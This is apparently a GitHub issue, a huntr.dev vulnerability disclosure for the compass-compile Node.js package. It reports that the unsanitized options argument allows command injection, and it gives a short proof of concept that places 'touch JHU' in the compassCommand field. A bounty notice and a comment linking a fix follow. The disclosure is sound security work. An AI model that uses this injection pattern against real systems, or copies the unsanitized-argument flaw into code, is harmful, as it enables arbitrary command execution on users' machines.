huntr.dev - Command Injection - Githubissues

quaertym / compass-compile

Compass wrapper for node.js

MIT License

0 stars 4 forks source link

huntr.dev - Command Injection #1

Open huntr-helper opened 4 years ago

huntr-helper commented 4 years ago

Vulnerability Description

Affected versions of this package are vulnerable to Command Injection. The options argument can be controlled by users without any sanitization.

POC:

var Root = require('compass-compile'); 
var root = new Root(); 
var options = { 
    compassCommand:"touch JHU"
     } 
root.compile(options);

Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/

JamieSlome commented 4 years ago

A pull request/fix has been suggested (https://github.com/quaertym/compass-compile/pull/2).